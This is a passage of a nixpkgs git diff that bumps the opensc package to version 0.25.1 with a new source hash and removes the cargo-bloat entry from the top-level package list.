-8,13 +8,13 @@ stdenv.mkDerivation rec { pname = "opensc"; - version = "0.25.0"; + version = "0.25.1"; src = fetchFromGitHub { owner = "OpenSC"; repo = "OpenSC"; rev = version; - sha256 = "sha256-pNorJiZzLGpxtlkog2d3E9xePMy9ASoHeWduqVZiBiA="; + sha256 = "sha256-Ktvp/9Hca87qWmDlQhFzvWsr7TvNpIAvOFS+4zTZbB8="; }; nativeBuildInputs = [ pkg-config autoreconfHook ]; diff --git a/pkgs/top-level/all-packages.nix b/pkgs/top-level/all-packages.nix index 13dd438e029f6..a58502126fbef 100644 --- a/pkgs/top-level/all-packages.nix +++ b/pkgs/top-level/all-packages.nix @@ -17087,7 +17087,6 @@ with pkgs; inherit (darwin.apple_sdk.frameworks) Security; }; cargo-binutils = callPackage ../development/tools/rust/cargo-binutils { }; - cargo-bloat = callPackage ../development/tools/rust/cargo-bloat { }; cargo-bolero = callPackage ../development/tools/rust/cargo-bolero { }; cargo-bundle = callPackage ../development/tools/rust/cargo-bundle { }; cargo-bundle-licenses = callPackage ../development/tools/rust/cargo-bundle-licenses { }; |